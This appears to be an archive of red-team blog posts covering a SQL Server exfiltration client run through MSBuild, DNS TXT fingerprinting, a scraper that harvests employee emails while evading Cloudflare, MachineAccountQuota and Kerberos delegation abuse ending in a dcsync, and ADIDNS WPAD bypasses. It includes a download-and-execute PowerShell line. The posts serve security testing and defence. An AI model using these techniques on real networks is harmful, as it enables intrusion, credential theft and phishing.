Back

Evil SQL Client Console: Msbuild All the Things

Esc Logo

Evil SQL Client (ESC) is an interactive .NET SQL console client that supports enhanced SQL Server discovery, access, and data exfiltration capabilities. While ESC can be a handy SQL Client for daily tasks, it was originally designed for targeting SQL Servers during penetration tests and red team engagements. The intent of the project is to provide an .exe, but also sample files for execution through mediums like msbuild and PowerShell.

This blog will provide a quick overview of the tool. For those who just want the code, it can be downloaded from https://github.com/NetSPI/ESC.

Why another SQL Server attack client?

PowerUpSQL and DAFT (A fantastic .net port of PowerUpSQL written by Alexander Leary) are great tool sets, but during red team engagements they can be a little too visible.  So to stay under the radar we initially we created a series of standalone .net functions that could be executed via alternative mediums like msbuild inline tasks.  Following that, we had a few clients request to exfiltrate data from the SQL Server using similar evasion techniques.  So we created the Evil SQL Client console to help make the testing process faster and the report screenshots easier to understand 🙂 .

Summary of Executions Options

The Evil SQL Client console and functions can be run via:

  • Esc.exe  Esc.exe is the original application created in visual studio.
  • Esc.csproj is a msbuild script that loads .net code directly through inline tasks. This technique was researched and popularized by Casey Smith (@subTee).  There is a nice article on detection worth reading by Steve Cooper (@BleepSec)  here.
  • Esc.xml is also a msbuild script that uses inline tasks, but it loads the actual esc.exe assembly through reflection.  This technique was shared by @bohops in his GhostBuild project.  It also leverages work done by @mattifestation.
  • Esc-example.ps1 PowerShell script: Loads esc.exe through reflection.  This specific script was generated using Out-CompressDll by @mattifestation.

Below is a simple screenshot of the the Evil SQL Client console executed via esc.exe:

Start Esc Compile

Below is a simple screenshot of the the Evil SQL Client console being executed through MSBuild:

Esc Msbuild

Summary of Features/Commands

At the moment, ESC does not have full feature parity with the PowerUpSQL or DAFT, but the most useful bits are there. Below is a summary of the features that do exist.

DiscoveryAccessGatherEscalateExfil
Discover fileCheck accessSingle instance queryCheck loginaspwSet File
Discover domainspnCheck defaultpwMulti instance queryCheck uncinjectSet FilePath
Discover broadcastShow accessList serverinfoRun oscmdSet icmp
Show discoveredExport accessList databasesSet icmpip
Export discoveredList tablesSet http
List linksSet httpurl
List logins
List rolemembers
List privy*All query results are exfiltrated via all enabled methods.

For more information on available commands visit: https://github.com/NetSPI/ESC/blob/master/README.md#supportedcommands

Wrap Up

Hopefully, the Evil SQL Client console will prove useful on engagements and help illustrate the need for a larger time investment in detective control development surrounding MSBuild inline task execution, SQL Server attacks, and basic data exfiltration.   For more information regarding the Evil SQL Client (ESC), please visit the github project.

Below are some additional links to get you started on building detections for common malicious Msbuild and SQL Server use:

Good luck and hack responsibly!

Back

Analyzing DNS TXT Records to Fingerprint Online Service Providers

DNS reconnaissance is an important part of most external network penetration tests and red team operations. Within DNS reconnaissance there are many areas of focus, but I thought it would be fun to dig into DNS TXT records that were created to verify domain ownership. They’re pretty common and can reveal useful information about the technologies and services being used by the target company.

In this blog I’ll walkthrough how domain validation typically works, review the results of my mini DNS research project, and share a PowerShell script that can be used to fingerprint online service providers via DNS TXT records. This should be useful to red teams and internal security teams looking for ways to reduce their internet facing footprint.

Below is an overview of the content if you want to skip ahead:

Domain Ownership Validation Process

When companies or individuals want to use an online service that is tied to one of their domains, the ownership of that domain needs to be verified.  Depending on the service provider, the process is commonly referred to as “domain validation” or “domain verification”.

Below is an outline of how that process typically works:

  1. The company creates an account with the online service provider.
  2. The company provides the online service provider with the domain name that needs to be verified.
  3. The online service provider sends an email containing a unique domain validation token (text value) to the company’s registered contact for the domain.
  4. The company then creates a DNS TXT record for their domain containing the domain validation token they received via email from the online service provider.
  5. The online service provider validates domain ownership by performing a DNS query to verify that the TXT record containing the domain validation token has been created.
  6. In most cases, once the domain validation process is complete, the company can remove the DNS TXT record containing the domain validation token.

It’s really that last step that everyone seems to forget to do, and that’s why simple DNS queries can be so useful for gaining insight into what online service providers companies are using.

Note: The domain validation process doesn’t always require a DNS TXT entry.  Some online service providers simply request that you upload of a text file containing the domain validation token to the webroot of the domain’s website.  For example, https://mywebsite.com/validation_12345.txt.  Google dorking can be a handy way to find those instances if you know what you’re looking for, but for now let’s stay focused on DNS records.

Analyzing TXT Records for a Million Domains

Our team has been gleaning information about online service providers from DNS TXT records for years,  but I wanted a broader understanding of what was out there.  So began my journey to identify some domain validation token trends.

Choosing a Domain Sample

I started by simply grabbing DNS TXT records for the Alexa top 1 million sites.  I used a slightly older list, but for those looking to mine that information on a reoccurring basis, Amazon has a service you can use at https://aws.amazon.com/alexa-top-sites/.

Tools for Querying TXT Records

DNS TXT records can be easily viewed with tools like nslookup, host, dig, massdns, or security focused tools like dnsrecon .  I ended up using a basic PowerShell script to make all of the DNS requests, because PowerShell lets me be lazy. 😊  It was a bit slow, but it still took less than a day to collect all of the TXT records from 1 million sites.

Below is the basic collection script I used.

# Import list of domains
$Domains = gc c:tempdomains.txt

# Get TXT records for domains
$txtlist = $Domains |
ForEach-Object{
    Resolve-DnsName -Type TXT $_ -Verbose
}

# Filter out most spf records
$Results = $txtlist  | where type -like txt |  select name,type,strings | 
ForEach-Object {
    $myname = $_.name
    $_.strings | 
    foreach {
        
        $object = New-Object psobject
        $object | add-member noteproperty name $myname
        $object | add-member noteproperty txtstring $_
        if($_ -notlike "v=spf*")
        {
            $object
        }
    }
} | Sort-Object name

# Save results to CSV
$Results | Export-Csv -NoTypeInformation dnstxt-records.csv

# Return results to console
$Results

Quick and Dirty Analysis of Records

Below is the high level process I used after the information was collected:

  1. Removed remaining SPF records
  2. Parsed key value pairs
  3. Sorted and grouped similar keys
  4. Identified the service providers through Google dorking and documentation review
  5. Removed keys that were completely unique and couldn’t be easily attributed to a specific service provider
  6. Categorized the service providers
  7. Identified most commonly used service provider categories based on domain validation token counts
  8. Identified most commonly used service providers based on domain validation token counts

Top 5 Service Provider Categories

After briefly analyzing the DNS TXT records for approximately 1 million domains, I’ve created a list of the most common online service categories and providers that require domain validation.

Below are the top 5 categories:

 PLACE CATEGORY
1 Cloud Service Providers with full suites of online services like Google, Microsoft, Facebook, and Amazon seemed to dominate the top of the list.
2 Certificate Authorities like globalsign were a close second.
3 Electronic Document Signing like Adobe sign and Docusign hang around third place.
4 Collaboration Solutions like Webex, Citrix, and Atlassian services seem to sit around fourth place collectively.
5 Email Marketing and Website Analytics providers like Pardot and Salesforce seemed to dominate the ranks as well, no surprise there.

There are many other types of services that range from caching services like Cloudflare to security services like “Have I Been Pwned”, but the categories above seem to be the most ubiquitous. It’s also worth noting that I removed SPF records, because technically there are not domain validation tokens.  However, SPF records are another rich source of information that could potentially lead to email spoofing opportunities if they aren’t managed well.  Either way, they were out of scope for this blog.

Top 25 Service Providers

Below are the top 25 service providers I was able to fingerprint based on their domain validation token (TXT record).  However, in total I was able to provide attribution for around 130.

 COUNT PROVIDER CATEGORY EXAMPLE TOKEN
149785 gmail.com Cloud Services google-site-verification=ZZYRwyiI6QKg0jVwmdIha68vuiZlNtfAJ90msPo1i7E
70797 microsoft office 365 Cloud Services ms=hash
16028 facebook.com Cloud Services facebook-domain-verification=zyzferd0kpm04en8wn4jnu4ooen5ct
11486 globalsign.com Certificate Authority _globalsign-domain-verification=Zv6aPQO0CFgBxwOk23uUOkmdLjhc9qmcz-UnQcgXkA
5097 Adobe Enterprise Services Electronic Signing,Cloud Services adobe-idp-site-verification=ffe3ccbe-f64a-44c5-80d7-b010605a3bc4
4093 Amazon Simple Email Cloud Services amazonses:ZW5WU+BVqrNaP9NU2+qhUvKLdAYOkxWRuTJDksWHJi4=
3605 globalsign.com Certificate Authority globalsign-domain-verification=zPlXAjrsmovNlSOCXQ7Wn0HgmO–GxX7laTgCizBTW
3486 atlassian services Collaboration atlassian-domain-verification=Z8oUd5brL6/RGUMCkxs4U0P/RyhpiNJEIVx9HXJLr3uqEQ1eDmTnj1eq1ObCgY1i
2700 mailru- Cloud Services mailru-verification: fa868a61bb236ae5
2698 yandex.com Cloud Services yandex-verification=fb9a7e8303137b4c
2429 Pardot (Salesforce) Marketing and Analytics pardot_104652_*=b9b92faaea08bdf6d7d89da132ba50aaff6a4b055647ce7fdccaf95833d12c17
2098 docusign.com Electronic Signing docusign=ff4d259b-5b2b-4dc7-84e5-34dc2c13e83e
1468 webex Collaboration webexdomainverification.P7KF=bf9d7a4f-41e4-4fa3-9ccb-d26f307e6be4
1358 www.sendinblue.com Marketing and Analytics Sendinblue-code:faab5d512036749b0f69d906db2a7824
1005 zoho.com Email zoho-verification=zb[sequentialnumber].zmverify.zoho.[com|in]
690 dropbox.com Collaboration dropbox-domain-verification=zsp1beovavgv
675 webex.com Collaboration ciscocidomainverification=f1d51662d07e32cdf508fe2103f9060ac5ba2f9efeaa79274003d12d0a9a745
607 Spiceworks.com Security workplace-domain-verification=BEJd6oynFk3ED6u0W4uAGMguAVnPKY
590 haveibeenpwned.com Security have-i-been-pwned-verification=faf85761f15dc53feff4e2f71ca32510
577 citrix.com Collaboration citrix-verification-code=ed1a7948-6f0d-4830-9014-d22f188c3bab
441 brave.com Collaboration brave-ledger-verification=fb42f0147b2264aa781f664eef7d51a1be9196011a205a2ce100dc76ab9de39f
427 Adobe Sign / Document Cloud Electronic Signing adobe-sign-verification=fe9cdca76cd809222e1acae2866ae896
384 Firebase (Google) Development and Publishing firebase=solar-virtue-511
384 O365 Cloud Services mscid=veniWolTd6miqdmIAwHTER4ZDHPBmT0mDwordEu6ABR7Dy2SH8TjniQ7e2O+Bv5+svcY7vJ+ZdSYG9aCOu8GYQ==
381 loader.io Security loaderio=fefa7eab8eb4a9235df87456251d8a48

Automating Domain Validation Token Fingerprinting

To streamline the process a little bit I’ve written a PowerShell function called “Resolve-DnsDomainValidationToken”.  You can simply provide it domains and it will scan the associated DNS TXT records for known service providers based on the library of domain validation tokens I created.  Currently it supports parameters for a single domain, a list of domains, or a list of URLs.

Resolve-DnsDomainValidationToken can be downloaded HERE.

Command Example

To give you an idea of what the commands and output look like I’ve provided an example below.  The target domain was randomly selected from the Alexa 1 Million list.

# Load Resolve-DnsDomainValidationToken into the PowerShell session
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerShell/master/Resolve-DnsDomainValidationToken.ps1")

# Run Resolve-DnsDomainValidationToken to collect and fingerprint TXT records
$Results = Resolve-DnsDomainValidationToken -Verbose -Domain adroll.com  

# View records in the console
$Results

Domain Validation Token Fingerprint

For those of you that don’t like starring at the console, the results can also be viewed using Out-GridView.

# View record in the out-grid view
$Results | Out-GridView

Domain Validation Token Fingerprint Gridview

Finally, the command also automatically creates two csv files that contain the results:

  1. Dns_Txt_Records.csv contains all TXT records found.
  2. Dns_Txt_Records_Domain_Validation_Tokens.csv contains those TXT records that could fingerprinted.

Domain Validation Token Fingerprint Csv

How can Domain Validation Tokens be used for Evil?

Below are a few examples of how we’ve used domain validation tokens during penetration tests.  I’ve also added a few options only available to real-world attackers due to legal constraints placed on penetration testers and red teams.

Penetration Testers Use Cases

  1. Services that Support Federated Authentication without MFA
    This is our most common use case. By reviewing domain validation tokens we have been able to identify service providers that support federated authentication associated with the company’s Active Directory deployment.  In many cases they aren’t configured with multi-factor authentication (MFA).  Common examples include Office 365, AWS, G Suite, and Github.

    Pro Tip: Once you’ve authenticated to Azure, you can quickly find additional service provider targets that support federated/managed authentication by parsing through the service principal names.  You can do that with Karl’s Get-AzureDomainInfo.ps1 script.

  2. Subdomain Hijacking Targets
    The domain validation tokens could reveal services that support subdomain which can be attacked once the CNAME records go stale. For information on common techniques Patrik Hudak wrote a nice overview here.
  3. Social Engineering Fuel
    Better understanding the technologies and service providers used by an organization can be useful when constructing phone and email phishing campaigns.
  4. General Measurement of Maturity
    When reviewing domain validation tokens for all of the domains owned by an organization it’s possible to get a general understanding of their level of maturity, and you can start to answer some basic questions like:

    1. Do they use Content Distribution Networks (CDNs) to distribute and protect their website content?
    2. Do they user 3rd party marketing and analytics? If so who? How are they configured?
    3. Do they use security related service providers? What coverage do those provide?
    4. Who are they using to issue their SSL/TLS certifications? How are they used?
    5. What mail protection services are they using? What are those default configurations?
  5. Analyzing domain validation tokens for a specific online service provider can yield additional insights. For example,
    1. Many domain validation tokens are unique numeric values that are simply incremented for each new customer.  By analyzing the values over thousands of domains you can start to infer things like how long a specific client has been using the service provider.
    2. Some of the validation tokens also include hashes and encrypted base64 values that could potentially be cracked offline to reveal information.
  6. Real-world attackers can also attempt to compromise service providers directly and then move laterally into a specific company’s site/data store/etc. Shared hosting providers are a common example. Penetration testers and red teams don’t get to take advantage of those types of scenarios, but if you’re a service provider you should be diligent about enforcing client isolation to help avoid opening those vectors up to attackers.

Wrap Up

Analyzing domain validation tokens found in DNS TXT records is far from a new concept, but I hope the library of fingerprints baked into Resolve-DnsDomainValidationToken will help save some time during your next red team, pentest,  or internal audit.  Good luck and hack responsibly!

Back

Collecting Contacts from zoominfo.com

For our client engagements, we are constantly searching for new methods of open source intelligence (OSINT) gathering. This post will specifically focus on targeting client contact collection from a site we have found to be very useful (zoominfo.com) and will describe some of the hurdles we needed to overcome to write automation around site scraping. We will also be demoing and publishing a simple script to hopefully help the community add to their OSINT arsenal.

Reasons for Gathering Employee Names

The benefits of employee name collection via OSINT are well-known within the security community. Several awesome automated scrapers already exist for popular sources (*cough* LinkedIn *cough*). A scraper is a common term used to describe a script or program that parses specific information from a webpage, often from an unauthenticated perspective. The employee names scraped (collected/parsed) from OSINT sources can trivially be converted into email addresses and/or usernames if one already knows the target organization’s formats. Common formats are pretty intuitive, but below are a few examples.

Name example: Jack B. Nibble

Img D D B A

On the offensive side, a few of the most popular use cases for these collections of employee names, emails, and usernames are:

  • Credential stuffing
  • Email phishing
  • Password spraying

Credential stuffing utilizes breach data sources in an attempt to log into a target organization’s employees’ accounts. These attacks rely on the stolen credentials being recycled by employees on the compromised platforms, e.g., Jack B. Nibble used his work email address with the password JackisGreat10! to sign up for LinkedIn before a breach and he is reusing the same credentials for his work account.

Email phishing has long been one of the easiest ways to breach an organization’s perimeter, typically needing just one user to fall victim to a malicious email.

Password spraying aims to take the employee names gathered via OSINT, convert them into emails/usernames, and attempt to use them in password guessing attacks against single factor (typically) management interfaces accessible from the internet.

During password spraying campaigns, attackers will guess very common passwords – think Password19 or Summer19. The goal of these password sprays is to yield at least one correct employee login, granting the attacker unauthorized access to the target organization’s network/resources in the context of the now compromised employee. The techniques described here are not only utilized by ethical security professionals to demonstrate risk, they are actively being exploited by state sponsored Cyber Actors.

Img D D A

Issues with Scraping

With the basic primer out of the way, let’s talk about scraping in general as we lead into the actual script. The concepts discussed here will be specific to our example but can also be applied to similar scenarios. At their core, all web scrapers need to craft HTTP requests and parse responses for the desired information (Burp Intruder is great for ad-hoc scraping). All of the heavy lifting in our script will be done with Python3 and a few libraries.

Some of the most common issues we’ve run into while scraping OSINT sources are:

  • Throttling (temporary slow-downs based on request rate)
  • Rate-limiting (temporary blocking based on request rate)
  • Full-blown bans (permanent blocking based on request rate)

While implementing our scraper for zoominfo.com, our biggest hurdle was throttling and ultimately rate-limiting. The site employs a very popular DDoS protection and mitigation framework in Cloudflare’s I’m Under Attack Mode (IUAM). The goal of IUAM is to detect if a site is being actively attacked by a botnet that is attempting to take the site offline. If Cloudflare decides a person is accessing multiple different pages on a website too rapidly, IUAM will send a JavaScript challenge to that person’s browser, similar to this:

As part of normal browsing activity via web browser, this challenge would be automatically solved, a cookie would be set, and the user would go about their merry way. The issue arises when we are using an automated script that cannot process JavaScript and does not automatically set the correct cookies. At this point, IUAM would hold our script hostage and it would not be able to continue scraping. For our purposes, we will call this throttling. Another issue arises if we are able to solve the IUAM challenge but are still crossing Cloudflare’s acceptable thresholds for number of requests made within certain time frames. When we cross that threshold, we are hit with a 429 response from the application, which is the HTTP status code for Too Many Requests. We will refer to this as rate-limiting. Pushing even faster may result in a full-blown ban, so we will not poke Cloudflare too hard with our scraper.

Dealing with Throttling and Rate-limiting

In our attempts to push the script forward, we needed to overcome throttling and rate-limiting to successfully scrape. During initial tests, we noticed simple delays via sleep statements within our script would prevent the IUAM from kicking in, but only for a short while. Eventually IUAM would take notice of us, so sleep statements alone would not scale well for most of our needs. Our next thought was to implement Tor, and just switch exit nodes each time we noticed a ban. The Tor Stem library was perfect for this, with built-in control for identifying and programmatically switching exit nodes via Python. Unfortunately, after implementing this idea, we realized zoominfo.com would not accept connections via Tor exit nodes. Another simple transition would have been to use other VPN services or even switching via VPS’, but again, this solution would not scale well for our purposes.

I had considered just spinning up an invisible or headless browser to interact with the site that could also interact with the JavaScript. In this way, Cloudflare (and hopefully any of our future targets) would only see a ‘normal’ browser interacting with their content, thus avoiding our throttling issues. While working to implement this idea, I was pointed instead to an awesome Python library called cloudscraper: https://pypi.org/project/cloudscraper/.

The cloudscraper library does all the heavy lifting of interacting with the JavaScript challenges and allows our scraper to continue while avoiding throttling. We are then only left with the issue of potential rate-limiting. To avoid this, our script also has built-in delays in an attempt to appease Cloudflare. We haven’t come up with an exact science behind this, but it appears that a delay of sixty seconds every ten requests is enough to avoid rate-limiting, with short random delays sprinkled in between each request for good measure.

python3 zoominfo-scraper.py -z netspi-llc/36078304 -d netspi.com

[*] Requesting page 1
[+] Found! Parsing page 1
[*] Random sleep break to appease CloudFlare
[*] Requesting page 2
[+] Found! Parsing page 2
[*] Random sleep break to appease CloudFlare
[*] Requesting page 3
[+] Site returned status code:  410
[+] We seem to be at the end! Yay!
[+] Printing email address list
adolney@netspi.com
ajones@netspi.com
aleybourne@netspi.com

..output truncated..

[+] Found 49 names!

Preventing Automated Scrapers

Vendors or website owners concerned about automated scraping of their content should consider placing any information they deem ‘sensitive’ behind authentication walls. The goal of Cloudflare’s IUAM is to prevent DDoS attacks (which we are vehemently not attempting), with the roadblocks it brings to automated scrapers being just an added bonus. Roadblocks such as this should not be considered a safeguard against automated scrapers that play by the rules.

Download zoominfo-scraper.py

This script is not intended to be all-encompassing for your OSINT gathering needs, but rather a minor piece that we have not had a chance to bolt on to a broader toolset. We are presenting it to the community because we have found a lot of value with it internally and hope to help further advance the security community. Feel free to integrate these concepts or even the script into your own toolsets.

The script and full instructions for use can be found here: https://github.com/NetSPI/HTTPScrapers/tree/master/Zoominfo

Back

MachineAccountQuota is USEFUL Sometimes: Exploiting One of Active Directory's Oddest Settings

MachineAccountQuota (MAQ) is a domain level attribute that by default permits unprivileged users to attach up to 10 computers to an Active Directory (AD) domain. My first run-in with MAQ was way back in my days as a network administrator on a new job. I was assigned the task of joining a remote location’s systems to AD. After adding 10, I received this message on my next attempt:

Maqerror

Researching the error message lead me to ms-DS-MachineAccountQuota. The details lined up with the unprivileged AD access I had been provided. I reached out to a fellow admin and explained the situation. He wasn’t familiar with how to increase the quota for my account. Instead, he provided me with a domain admin account to continuing working (privesc!).

Powermad

In late 2017, I released Powermad, which is a collection of PowerShell functions derived from an LDAP domain join packet capture. After digging through the packets, I identified the single encrypted LDAP add that created the machine account object. Here is an example of the LDAP add in an unencrypted state:

Maqldapadd

My main motivation while developing Powermad was to more easily incorporate MAQ during testing. In the past, I had seen testers leverage MAQ by attaching a full Windows OS to a domain. Rather than only using MAQ in this way, I wanted to be able to just add a machine account (aka computer account) set with a known password.

Maqnew

So Is MachineAccountQuota Useful?

Since I first started working on Powermad, I’ve learned a lot about MAQ beyond just the default 10 system limit. Recently, I’ve learned even more from some amazing blog posts by Elad Shamir, Harmj0y, and Dirk-jan, in which MAQ makes an appearance.

Overall, the conclusion I’ve reached is that MachineAccountQuota is useful…

Sciencemaq

…sometimes.

In this blog post, I’ll go through 10 rules for working with MAQ as an attacker. I wrote these rules from the perspective of just adding a machine account to AD rather than attaching a Windows OS. Later, I’ll apply some of the rules to a MAQ + Kerberos unconstrained delegation use case. Finally, I’ll address defending against MAQ related exploits (spoiler: set to 0).

What Are The Rules?

I’ve broken up what I know about MAQ into 10 rules. Hopefully, you can use these rules to determine if MAQ can be useful in any particular situation.

  1. MAQ allows unprivileged users to add machine account objects to a domain. By default, an unprivileged user can create 10 machine accounts.

    Maqdefault

    You do not need to do anything special to invoke MAQ. You can simply attempt to add a machine account using an account that has not been directly granted the domain join privilege.
  2. The creator account’s SID is stored in the machine account’s ms-DS-CreatorSID attribute. AD populates this attribute only when the creator is not an administrator, or has not been delegated the privilege to add machine accounts.

    Maqcreatorsid

    AD also uses ms-DS-CreatorSID to calculate the current count against MAQ. From a testing perspective, keep in mind the attribute is an arrow pointing to the creator account, even with nested MAQ usage. Therefore, using machine accounts created through MAQ does not fully shield the creator account.

    Maqcreatorsid

    If the defense is aware of the ms-DS-CreatorSID attribute though, there is probably a good chance they have already disabled MAQ.
  3. Machine accounts created through MAQ are placed into the Domain Computers group. In situations where the Domain Computers group has been granted extra privilege, it’s important to remember that this privilege also extends to unprivileged users through MAQ. For example, you may find Domain Computers listed within a local Administrators group.

    Maqlocaladmin

    Or even better, within a Domain Administrators group.

    Maqda

    As a slight extension to this rule, be on the lookout for automation that places computers in OUs and/or groups based on portions of the machine account name. You may be able to leverage the automation through MAQ.
  4. The creator account is granted write access to some machine account object attributes. Normally, this includes the following attributes:
    1. AccountDisabled
    2. description
    3. displayName
    4. DnsHostName
    5. ServicePrincipalName
    6. userParameters
    7. userAccountControl
    8. msDS-AdditionalDnsHostName
    9. msDS-AllowedToActOnBehalfOfOtherIdentity
    10. samAccountName

      You can modify these attributes as needed.
      Maqwrite
      However, the permitted values of some attributes are still subject to validation.

  5. The machine account itself has write access to some of its own attributes. The list includes the msDS-SupportedEncryptionTypes attribute which can have an impact on the negotiated Kerberos encryption method. Modern Windows OS builds will set this attribute to 28 during the process of joining a domain.Maqself
  6. The attribute validation is strict at the time the machine account is added. Basically, the attribute values need to match up. If they don’t match, the add will fail such as in this example where the samAccountName is incorrect.
    Maqldapadd
    Strangely, after a machine account is added, some of the validation rules are relaxed.
  7. The samAccountName can be changed to anything that doesn’t match a samAccountName already present in a domain. Changing this attribute can be helpful for blending in activities with legitimate traffic such as by stripping the ‘$’ character or by matching an in-use account naming convention. Interestingly, the samAccountName can even end in a space which permits mimicking any existing domain account.
    Maqsamaccoutnname
    Here is how the fake ‘Administrator’ account appears in action.
    Maqsamaccountname
    Note, changing the samAccountName will not change the actual machine account object name. Therefore, you can have a machine account object that blends in with the naming convention while also having a completely different samAccountName.
  8. Adding a machine account creates 4 SPNs. The list includes the following:
    1. HOST/MachineAccountName
    2. HOST/MachineAccountName.domain.name
    3. RestrictedKrbHost/MachineAccountName
    4. RestrictedKrbhost/MachineAccountName.domain.name

      As an example, here is the default SPN list for the ‘test.inveigh.net’ machine account.
      Maqspn
      After you add the machine account, you can append or replace the list with any SPN that passes validation.
      Maqspn

      If you modify the samAccountName, DnsHostname, or msDS-AdditionalDnsHostName attributes, the SPN list will automatically update with the new values. The default SPNs do cover a lot of use cases though. So, you won’t always need to modify the list. If more information on SPNs is needed, Sean Metcalf has really good list at AdSecurity which includes details on Host and RestrictedKrbHost.

  9. Machine accounts do not have logon locally privilege. However, machine accounts work just fine from the command line with tools that accept credentials directly or through ‘runas /netlonly’. The tasks can include enumeration, adding DNS records, or really just about any non-GUI action that applies to a user account.Maqrunas
  10. Machine accounts added through MAQ cannot be deleted by the unprivileged creator account. To completely cleanup AD after using MAQ, you will need to elevate domain privilege or pass the task along to your client. You can however disable the account with the unprivileged creator account.Maqdisable

MachineAccountQuota In Action

Let’s take the above rules and apply them to a compromised AD account that has SeEnableDelegationPrivilege. As mentioned in rule 4, even though an account has write access to an attribute, the write attempt is still subject to validation.

Maqdelegation

However, if you happen to compromise an account with the correct privilege, such as SeEnableDelegationPrivilege, things can get interesting.

Maqdelegation

In this case, we can use the ‘INVEIGHkevin’ account, along with MAQ, to create and configure a machine account object capable of performing Kerberos unconstrained delegation. Conveniently, this can remove the requirement for finding an existing suitable AD object for leveraging SeEnableDelegationPrivilege. Basically, we can just make our own through MAQ.

Note, this is one of those scenarios where, if you can, just joining a domain with your own Windows system can make things easier. If you do go that route, just enable unconstrained delegation on the machine account object and leverage it just like you would on a compromised system. The good news is that the process is still very manageable when we use only a machine account.

Kerberos Unconstrained Delegation Setup

For this scenario, let’s assume that we have unprivileged access on a random Windows domain system and have also compromised an SeEnableDelegationPrivilege account.

Here are the steps to setup the attack:

  1. Use the SeEnableDelegationPrivilege account to add a machine account through MAQ.Maqldapadd
  2. Enable unconstrained delegation by setting the userAccountControl attribute to 528384.Maqdelegation
  3. Optionally, set the msDS-SupportedEncryptionTypes attribute to set the desired Kerberos encryption type using the machine account’s credentials.Maqencryption
  4. Optionally, add a corresponding DNS record matching the SPNs and pointing to the compromised Windows system. This can usually be done with through either dynamic updates or LDAP. This is optional since with the default SPNs, Kerberos will can also trigger from other name resolution methods such as LLMNR/NBNS.Maqadidns

Kerberos Unconstrained Delegation Attack

With the above in place, we next need to sort out how to get the desired account traffic to the compromised host. For this first round, we’ll use tifkin’s printer bug to get a domain controller machine account to connect to our system over SMB. Additionally, we will be using the dev Branch version of Inveigh. Through packet sniffing, this version can grab SMB Kerberos TGT traffic and attempt to output a kirbi file for use with tools such as Mimikatz and Rubeus.

For Inveigh, we will need to have either the unconstrained delegation account’s AES256 hash or a PSCredential object with a Kerberos salt as the username. Shown below is the process of generating the correct AES256 hash using Powermad’s Get-KerberosAESKey function.

Maqaeshash

Note, Inveigh currently only supports AES256 Kerberos decryption.

Since we want to use our unconstrained delegation machine account’s SPN, we will need to have the target connect to the correct host name. For this example, I’ll use Dirk-jan‘s printerbug script from his recently released Krbrelayx toolkit.

Maqprinterbug

At this point, let’s take a step back and go over the various SPNs in play. First, we have a compromised system running an SMB server as SYSTEM. This means that the SMB server will decrypt Kerberos tickets using the system’s machine account credentials. If we cause an SPN mismatch and attempt to perform Kerberos authentication with data encrypted under a different SPN, the SMB authentication will fail. However, the SMB server will not reject the authentication attempt until after the client has transmitted the AP-REQ.

Maqsmb

More importantly for this scenario, the SMB server will reject the connection after receiving the TGT. Therefore, if we can grab the Kerberos traffic through packet sniffing, we can decrypt the needed data with the machine account credentials we have in our possession.

Maqinveigh

Note, using the SPN mismatch trick has a tendency to trigger multiple Kerberos authentication attempts from a client. I have Inveigh set to only output 2 kirbi files per user by default. Inveigh stores the rest in memory for access through Get-Inveigh.

Now that we have a kirbi TGT for the domain controller, we can pass it to Mimikatz and attempt a dcsync.

Maqmimikatz

For another quick example, I used Inveigh to capture a Domain Administrator TGT over SMB.

Maqkirbi

Next, I used the kirbi file with Rubeus.

Maqrubeus

As a last example, below is Inveigh catching a TGT over HTTP.

Maqinveighhttp

HTTP may, in ideal conditions, remove the requirement for local administrator access on the compromised system.

Finally, the Kerberos unconstrained delegation technique above would also work well with the new krbrelayx toolkit.

One last word on SeEnableDelegationPrivilege + MAQ, fully setting up standard constrained delegation is usually out of reach due to the lack of write access to msDS-AllowedToDelegateTo.

Defending Against MachineAccountQuota

I believe that MAQ is just one of those default settings without enough awareness. I’m guessing companies rarely actually need the default MAQ setting or even need it enabled at all. To disable MAQ simply set the count to 0. If you do need to allow unprivileged users to add systems, the better route is to just delegate the privilege to specific groups. Just be aware that much of what is listed in this blog post would also apply to a compromised account with delegated domain join privilege.

Defenders can also keep an eye out for two things:

  • Populated ms-DS-CreatorSID attributes
  • Machine accounts that are not changing their passwords

Conclusion

As with most things, MachineAccountQuota usage is situational. For testers, it is however something that is worthy of consideration for your bag of tricks. This has become even more apparent with recently released techniques from researchers such as Elad Shamir. For defenders, I recommend just disabling MachineAccountQuota.

Special thanks to Karl Fosaaen for the Always Sunny photoshop.

Back

ADIDNS Revisited – WPAD, GQBL, and More

A few months ago, I wrote a blog post on exploiting Active Directory-Integrated DNS (ADIDNS). This post will mainly cover some additional techniques on both the offensive and defensive fronts. I would suggest at least skimming the original post before continuing here.

Wildcardrevisited

With that out of the way, I’d like to start by adding in another well known and problematic default setting related to name resolution that I left out of the original post.

So What About WPAD?

Web Proxy Auto-Discovery (WPAD) is of course a common target during LLMNR and NBNS spoofing. At first glance, WPAD would seem like the most obvious record to add through ADIDNS. Authenticated users can usually add the record since it does not exist by default.

If you do add a record for WPAD, you will likely find that it just doesn’t do anything. This behavior is due to the global query block list (GQBL), which contains WPAD and ISATAP by default.

Gqbl

Modern Windows DNS servers will usually not answer name requests which match hosts listed in the GQBL. Why did I include the word ‘usually’? Well, it turns out that the GQBL doesn’t always work.

Bypassing the GQBL

While I was experimenting with wildcard records, I noticed that Windows DNS servers ignored the GQBL and answered requests for WPAD through wildcards. At this point in the research timeline though, I hadn’t started working with LDAP. I could only add records through dynamic updates. Since the ‘*’ character didn’t work correctly with dynamic updates, I decided to look for a GQBL bypass method that would work with dynamic updates.

The first additional method I found was through DNAME records. Windows DNS servers would resolve WPAD if a DNAME record of ‘wpad’ was present in a zone.

Dname

Normally, DNAME records do not resolve requests that match the actual record. The DNS server should only answer requests for a host within the mapped domain such as ‘host.wpad.inveigh.net’. In this case, the root of ‘wpad.inveigh.net’ would resolve.

Strangely, I found that Windows DNS servers answered requests for the root of a DNAME record when certain conditions were met. The record needed to match a host that was listed on the GQBL and the GQBL needed to be enabled. With regards to WPAD, the default enabled GQBL actually made things worse.

Unfortunately, I couldn’t get DNAME records to work with dynamic updates. So, back I went looking for another bypass. I found this one in the form of adding an NS record for a WPAD subdomain.

Nsrecord

This method is slightly more complicated since it requires that the NS record points to a DNS server under your control. DNSChef, available on Kali, provides a simple way to just setup a DNS server that will answer any received request.

Dnschef

Again, I couldn’t get the bypass to work with dynamic updates. Once I finally started working with LDAP, all three bypass methods became trivial to implement.

Note, there appears to be a slight difference in behavior for 2016 versus previous server versions. If you work with a record type that expects to point to a DNS records instead of IP addresses, you will indeed need to use a DNS record. Earlier DNS server versions worked with IP addresses in most cases. With 2016, if an existing target record does not already exist, you may need to add an additional record to get some record types setup as required for your attack.

CVE-2018-8320

